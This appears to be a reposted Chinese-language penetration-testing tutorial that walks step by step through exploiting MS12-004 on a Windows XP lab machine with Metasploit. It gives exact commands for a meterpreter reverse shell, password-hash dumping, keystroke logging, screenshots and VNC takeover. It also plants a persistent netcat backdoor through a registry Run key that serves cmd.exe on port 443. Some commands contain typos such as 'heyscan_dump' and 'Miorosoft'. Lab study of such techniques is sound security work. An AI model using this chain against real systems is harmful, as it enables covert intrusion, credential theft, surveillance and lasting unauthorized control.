Metasploit渗透测试【进阶】

Metasploit渗透测试【进阶】

摘要

记录一次完整的Metasploit测试!利用漏洞MS12-004


工具 :

  • Metasploit Feamwork
  • Netcat

Let’s Go!【漏洞查证】!

1:控制台执行 msfconsole 启动Metasploit :>>>

msfconsole

2:输入命令 search ms12_004,我们来找找ms12-004漏洞的利用模块>>>

search ms12_004

3:找到之后,接下来使用该模块,输入命令:>>>

Use exploits/windows/browser/ms12_004_midi

4:显示该漏洞的基本信息,以及要设置的参数输入命令:>>>

show options

5:设置参数,输入命令 :>>>

set  SRVHOST  192.168.42.139

Set  PAYLOAD  windows/meterpreter/reverse_tcp

Set  LHOST  192.168.42.130

Set  URIOATH  

最后 再输入show options ,查看是否设置好

漏洞利用

1:开始渗透,执行命令 :>>>

Exploit

  • 可以看到服务已经启动了,链接地址http://192.168.42.130:8080/
  • 在用Xp打开恶意链接地址 http://192.168.42.130:8080/

    BackTrack 开始渗透,这边BT5已经有反应了 ,渗透成功

输入命令:>>>

Sessions

我们看到有一个会话,会话的 ID 是1 ,开打开这个会话,输入命令:>>>

Sessions -i 1

这时,我们已经进入了Meterpreter
Meterpreter 是一个很强大的 payload , 具体说明输入 help 可以看到,

Meterpreter > hashdump // 可以看到远程主机帐号和加密后的密码

这里再说几个常用的Meterpreter 命令

Meterpreter  >  keyscan_start   //开启键盘记录
Meterpreter  >  heyscan_dump  //  查看键盘记录的内容
Meterpreter  >  keyscan_stop    //  关闭键盘记录
Meterpreter  >  shell   //看下图大家都懂的

Meterpreter > ps // 获取远程主机进程列表,比windows自带的任务管理器清晰多了

Meterpreter > screenshot // 截取远程桌面屏幕

Meterpreter > run vnc // 开启远程主机vnc 服务

过一会,可以看到桌面,并且可以控制鼠标和键盘

后门程序植入

  • 1:先上传 nc.exe(netcant)到windows的systen32文件夹下
Meterpreter  > Upload   /pentest/windows-binaries/tools/nc.exe   c:\windows\system32
  • 2:将nc.exe加到注册表,让他开机自启动
  • (1)先查看注册表
Reg  enumkey  -k  HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run
  • (2)看到注册表键值、加入注册表
Reg  setval  -k  HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run  -v  backdoor  -d  c:\windows\system32\nc.exe”-L  -d  -p  443  cmd.exe”
  • (3)提示成功,查看下XP的注册表
  • 3:我们重启远程主机试下,输命令:>>>

    reboot

  • 4:

    Telnet 192.168.42.139 443

    本文整理自:【http://blog.0x7c00.cn/?p=165】

你可能感兴趣的:(安全,CTF)